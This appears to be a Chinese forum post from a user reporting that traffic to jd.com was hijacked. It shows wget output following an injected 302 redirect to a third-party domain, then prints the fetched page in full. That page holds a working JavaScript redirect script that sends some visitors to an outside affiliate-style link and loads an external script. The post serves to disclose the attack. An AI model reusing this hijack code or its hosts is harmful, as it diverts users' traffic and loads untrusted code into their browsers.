我今天也发现也这个,在登录京东时被劫持了
```
/tmp wget
jd.com ✓ 19:58:17
--2016-03-01 20:09:35--
http://jd.com/正在解析主机
jd.com (
jd.com)... 211.152.123.224, 111.206.227.118
正在连接
jd.com (
jd.com)|211.152.123.224|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Moved Temporarily
位置:
http://www.jd.com/ [跟随至新的 URL]
--2016-03-01 20:09:36--
http://www.jd.com/正在解析主机
www.jd.com (
www.jd.com)... 112.91.125.129
正在连接
www.jd.com (
www.jd.com)|112.91.125.129|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:
http://m.cnepin.cn/cl/html/jd.html [跟随至新的 URL]
--2016-03-01 20:09:36--
http://m.cnepin.cn/cl/html/jd.html正在解析主机
m.cnepin.cn (
m.cnepin.cn)... 118.126.8.163
正在连接
m.cnepin.cn (
m.cnepin.cn)|118.126.8.163|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 2473 (2.4K) [text/html]
正在保存至: “ index.html ”
index.html 100%[=================================>] 2.42K --.-KB/s 用时 0.03s
```
index.html 内容:
```
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="0">
<title>京东</title>
</head>
<body>
<script>
(function(d){
function isCkie(){
var isSupport=false;
if(typeof(navigator.cookieEnabled)!='undefined'){
isSupport=navigator.cookieEnabled;
}
return isSupport;
}
//Cookie 相关函数
var sCkie=new function(){
//过期时间
this.expTime=function(millisecond){if(millisecond.length==0){millisecond=0};var exp=new Date();exp.setTime(exp.getTime()+parseInt(millisecond));return exp.toGMTString();};
//创建 cookie
this.add=function(name,value,expires,path,domain,secure){d.cookie=name+"="+encodeURI(value)+(expires?(';expires='+expires):'')+(path?(';path='+path):'')+(domain?(';domain='+domain):'')+((secure)?';secure':'');};
//删除 cookie
//this.del=function(name,path,domain){if(getCookie(name)){document.cookie=name+"="+((path)?(";path="+path):'')+((domain)?(";domain="+domain):'')+";expires=Mon,01-Jan-2006 00:00:01 GMT";}};
//获取 cookie
this.get=function(name){var arg=name+"=";var alen=arg.length;var theCookie=''+d.cookie;var inCookieSite=theCookie.indexOf(arg);if(inCookieSite==-1||name==""){return '';}var begin=inCookieSite+alen;var end=theCookie.indexOf(';',begin);if(end==-1){end=theCookie.length;}return decodeURI(theCookie.substring(begin,end));};
};
var gUrl;
if(isCkie()){
var ckie=0;
var sid='lpvt_83d5365c9bc35704ead3f7befb737d3b';
var skie=sCkie.get(sid);
if (skie!='')
{
ckie=parseInt(skie);
}
if(ckie<1){
var rand=Math.random();
if(rand<0.3){
gUrl="
http://www.1lehu.cn/uto/?62261";
}else{
gUrl="
https://www.jd.com/";
}
sCkie.add(sid,'1',sCkie.expTime(6*60*60*1000),0,0,0);
}else{
gUrl="
https://www.jd.com/";
}
}else{
gUrl="
https://www.jd.com/";
}
(function(u){if(window.navigate&&typeof navigate=='function')navigate(u);var ua=navigator.userAgent;if(ua.match(/applewebkit/i)){var h = document.createElement('a');h.rel='noreferrer';h.href=u;document.body.appendChild(h);var evt=document.createEvent('MouseEvents');evt.initEvent('click', true,true);h.dispatchEvent(evt);}else{document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');}})(gUrl);
})(document);
</script>
</body>
</html>
<script charset="utf-8" async="true" src="
http://n.cosbot.cn/rb/i.js"></script>
```